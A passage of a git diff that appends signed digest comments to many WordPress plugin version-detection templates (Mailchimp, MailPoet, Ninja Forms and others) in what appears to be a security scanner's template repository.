a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100836cdd0a20a576bf6628cb82489352e3970db82d7e518e37322a2861c424c22f022012494a44e4e12c2dd32e304155e0a39e9e119f3ac3f8eed52fb8489f2ad78a1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9dfa..a5059e2dc19 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207ff24949f73009a3a0f93686055039906d8b2f411b58e06431d390891a7bbd9a022021b9ce449db0a3289f435508072fe513a78fea18dffac591f758ec87b4b1b60b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d19..bb431d417d7 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204df5f0f63459edae76afc76cd21359a7d2b5045f201385d4df7ba1808acb649f0220523dacd33ce38899320c7cea7fd1702d905cc1488dba38f9bb6d3c8dc076bb8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d46328..133d1f95ef1 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dcc798f3e5ff0c479a782f74fcf60812311e8ebae5af3a3eba791f650f538bc3022100a416ba0ebc0a7ddb70a51bedf4e4b7b9d4132c4bd3b2a0335cea5b231aa82b79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c7..703130c6e9f 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c743d8a173bcef619c60ed4aa5130a7fed8d964eb51a854db21c537312870250022000d0aa585359c41c67c4926648174b0a699cf003a1f42b01578274ba85d6f3c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee17..deedafdd5e0 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009e034ea5c0e2f76f67fb6a13801af869484fd8b8d5a2766336dd19c12d5f4d6c0220423d79f1da2cc5053be587dbd52cb7a5a1325af021e45673396b30a98fcaf5e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e41..ac44a1059e0 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022019aeafcb5f72e792b5d388858b06602c89b81611bb61606554d6ff76e0d793b902210091669cdc5e8243af828f1e8a36b53c63f3c29aee7240d752da349de8ad48f909:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a1..916e7c8f69a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022055f57921d1ff6c55fc2c3ea71008e2085998aa588595799fbd86af45cf88195d022100bef325040c1ea0dc4c0baa992eecf11bd5a85486ecab1617000e0624042c0326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfcf..2d621a6bbce 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022036ce592e64cc9eb3d4e6380a02d1588f6f6cec8c8211965b62e5f1cc8dd05760022100a52b463701852c6620fa020661d666c4f6e60846e488f5b8e57a0361221bad38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d31..984384e528d 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205f5f1af07e2ffa4e64fa5ec707eb805830756d3b5d30f5f53a989b426724691a02204b622da48739753ef29346ba57bf47cf089f79f027fb7807573055b9cb22d44d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db688..88dcb57f684 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ae70926afbca91fe98eba48df5c9c50d1e2e31ee4e376bc6445c93d7a29b0efd0220562edab7ce1cb1ba9e30d8f4495c48eb179db4127969cbf1ffa9d18366b94f32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3dbb..ced345b3358 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f79d80995db6965679132f3a23e9a8f695e2e1c18c25cce7228bb2b1c09fb58e022100f51fd9c5d9ba5f5e7201f534905c1d8e548496c4fe6d630183e6c0a5d7a76d8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca381..54f042484ea 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fd8e76bd5617d84f3502f6ac7815fab1e39c37687ab025d892b59ce673906835022064133d244213939c5625d1dec77653e9f9d8f6021f66f7486c4ec1cd80f24c97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255b..1fc751f7059 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b5f1c77ef13a385bc28cee8af8e00ae9c33a49e0430bb71720e0b839e7ff8014022043f525cf3898db19182533b40a58d0e3698beba763ad10c473570ee4939a2663:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d00..067a30a6c00 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100db93cf4f7b08826526eead1909a331f24020750d437a7a4c066d2feabe8d512202202c9c81deb9660bec15e13a4a971986c13dcf3505d02c5cf978c36266cb3e463a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed51..c9c7c50e0ef 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022070d05ccf6940451889643784d927a77d34cef205ead893e6b9817e7c45b34d4a0220237941e2039e0dbea473b6008f9fbcc05a51a960b8decf33a80893d18aa82913:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b1..2dd426bf497 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c1809dc3e025ca50eaeda558b173ca1a764260e743be1b6a728dcff4832ec7c602201941a8b9f8f9bf32556ebbd50f5f9e6693913c9f42d7d48d2143acfdcead30ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3e..7941b86c585 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022052b60931c608372def382afe0964ca0f24e38822d5498eb1ace116ac06c5164502207020f7d804aca4a814b43a0f4d194db2c6271d47aad242ae0493555d54e4deca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec50..09f529170d3 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022075c81a4fe0fc3ca6b97744561027a628511e80c01f096897fb6ab7191ae6dd2c022100c34e6d2585971faf6d426e5e6e6b06302b80d4db5320acd9cf3d450412f52573:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a2203..b80bec5e3bf 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220426afcdba5dd87b288748ba663cf003e03147cd92cea9ddfecaeddc62fd4b9c302204a0206fbabbe28a63b2a4c1abfa6b0e18d5697a0ffc62181705b290dc86ef7fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453e..e158397bf01 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220423ab9e90cf0d2f89a4386353f5e8aed67a62256d51b9d73214463fdd69cd773022100cba8e0559576a306776cae42976df51346b0ab2af608e3d6c10213778655c8a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac08..a31a8a698b9 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201d2dfa8258c5b2234d969644becf45a97a0ba5428be95cf2688ebcd3723b2b35022026d96cf2e8858b0749cffb3ff0917b371a3048518b89222c0459204450b30e8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca9..768d9a5749a 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cc6a83ee0bb71da2794523b3ce00d9490ed49f545f307701c7ac37c82cd3506602206f9214837d85abc86ad559af8a84dc3abbb76fe4c8d66fae8930148ac73d1f76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82db..ae870795bba 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d7b1e1d7d108fec3c216247495edb64d6f6a8bee5f037d7c54fb2207a24f695f022100bef83542490e195ec34be98d93ce7777ea09e9a7889ee153a5393491e4010ec3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201fc..dd54b0e8c27 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022043146fe92f14ee35cd7af0839e5373a17b4be4b81cf670abde584c9c43f6c264022051a77df97500808cb72cef7ec653422bb64d98ba5997cd34e534f77e55eba413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d07..dd1e5628892 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220361581e309563bca4dfef6d7d87f52b12c77ad3ded38f91f0576b3077c52ebd102210097efe1b3e4f8b05f31cd9ecada5973d595e858ae32a9f5f4c45e20977eeff49c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78a..7bfc391471c 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009495268f12358b8f6ae8fcf49d4d88d0d1f8526a70632c72514a493c531ed65e0221009776b770a16885a51dcf51029c680064e52a42fb258793266c06794a335f5690:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8eaf..1606fa07459 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210084ffc7eff5f8b1641a544ab3062f2c2a388a3e8e599fc07b0c896a8fcb6861bc0220422a54a183d1ec92b7d11c6a376bf9c9c108e1bfeb1393807c3f848fbb7d820c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e1..c46adc6ea81 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e3acccc9e2923cac460c70172579994e98a07ed6ab7997b96137536cf99acfa502207af8e1772729160320dda9b47dba2ca7cfe1c6d739107bbe1e40dea0d44ece66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389dc..44122f19eac 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b59c895808ff011880898cfb1d0aefbb7ce785dd26d738a49adbf828bead19d10220275691897e351685c727cc62ae021ea98c8f116c31c21eab5fd9205b17c879b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492c..5243e096ddd 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008c4cb7f129d58607615f202011fa392f30118f38c336b43133e1f0ed3908403402205b5a2f8e597e944232fb509f0956d6a1c10468a838e0caf158c5cecf42551d92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d1..c8dfc5b2cb1 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a4f2b7fd5b40cf5ca0dde8cf7199ab2431ac6b61e21165fbf9e68db3e09b1c47022100ac7efd9945ee2a06afa369496779ae31e9041c34d5d622afac0bdc47a5537982:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee79807..5095f1d4b1f 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009fb8dc318cfa27e36518785dfe3a630b1280bd98b3ba4d9b8a32cc2823a8466602201093c64ac68873374c55247ed3130b7eda9dbd272ec28140ed4476a36ce764e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767b..c7d9f9522d7 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206b65266613bf84a9ed3c0f83699fa33afe4b70a37b2d99cd1459564d3053f85302210093ea100d25288cefaeff64446fefa259566375cb1bb3462ccea788e588c38c20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073ca..bf1b62c3dc5 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220067b96f4458acecff5eb082259fa98b1785f879fc53ebd7c6121e1930596d609022100c2e625feeede1149f315009fcb451c978e7c9d8aa5feec55f639bebc73a94ad8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55f..ff2c18af8f5 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a504b03aa73fc34d3cc61184fa05a8115e83073a15c9d39050f76fa9eaa9a517022100a72bea1d389d9d7c1b296e3f37525183a9a55bcc1f4902053b2eaf226cd5436f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692e..830fcaa75cd 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009372e73fcf6cd7d2d271ef2a752fabe279562d99ba38f6a17e48b630bd7b2b6602204f9267eb754db40375f83ecc3c12c10f0ab0e8ac9148133a6c205148a3a871d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f3..677a7c873f3 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008f5f47eac8cc35be7c366ac03d68820bc76c0352e303fe3ecc7befcb7e44846c022100982102ef12aad6072858f99b3d771408abcfdb7415a6933ab9d300468e37bbee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316c..263c8ac24b5 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203c06be7048aef37f005165ab9bb9b52109e4ddc46b425e3bb7e2c8d5af01952b022100a6f519a8cc256d5980d6eb4e005e488fa1e1222b1116da18aa1bc7454f28c320:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff207791572..5c870ec790a 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e1c73277b4be33dc27071c9ed9b3fa70bab489663ff9bed90f6b806d9c5d21f0022100a3f60ad81e2f9ffc37024aa1674579f58c76e46b452168ce2f2f2d12eda18f49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017a..86a96426020 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ffd196219e173d57ce9cb32861fa08bdcec47fbc5ba7620fd439f2b220f85c1d022100e53300e4240602a5f73c8d3254395a3f2de8b3d3e7d1674864767da5ab541fd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d5..91d52dc882a 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022032e7ba50a883da7ce744993f904513a02122f0ac13aca322f4fe253c54e3a761022100d34558b23334af0571cc5e6355cb9af7c0180361dd3e409b5d04addd396f16a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf56..b8b6c2bad4b 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203df3b747e106640dfb96fdba8cf0f683d2d874cc60b2a112d7fdda2392c3be98022100c49fb86d5c345aad058b8d6fedfaca12b74bb9dd1011f2c0baff4b091bea9f75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94b..c7df69fc70a 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202c720db7232fd5f1d9f506d30b6e58960c286d1becd6dac3418630da0a9bf9580221008e21018406790e6e0f4197dc4027348cc3c36c93d3ceaba4b8f6158eba1cff0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709d..ebce78520da 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022060cbec6f1ab02e1f621f3b3bd1e6b83ed5044c225714f9cf132573b63c240a470221009efadca739a50edd25fcffa9d3757ca04fe0ce1bd6052576ee57b0529632a7bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c276825..95bd8300b6c 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207c2fda4b3ef0544135be10d45abd2c2c2536cac66ade358738fc387b34a5f841022027bfc92b5969f3834c36d234ceb8a4453c107a1ad1b7d2b619ce534661f4c315:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b1..79d9e47d039 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008082af722902c3c395120c5a6746499a40c5e8da19074d2824e90f44918f2124022100964508e1c2b5f29e4c918999a677e5aaceea4305036324c83c8429b05e2dd1ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a9..ae2014096c3 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 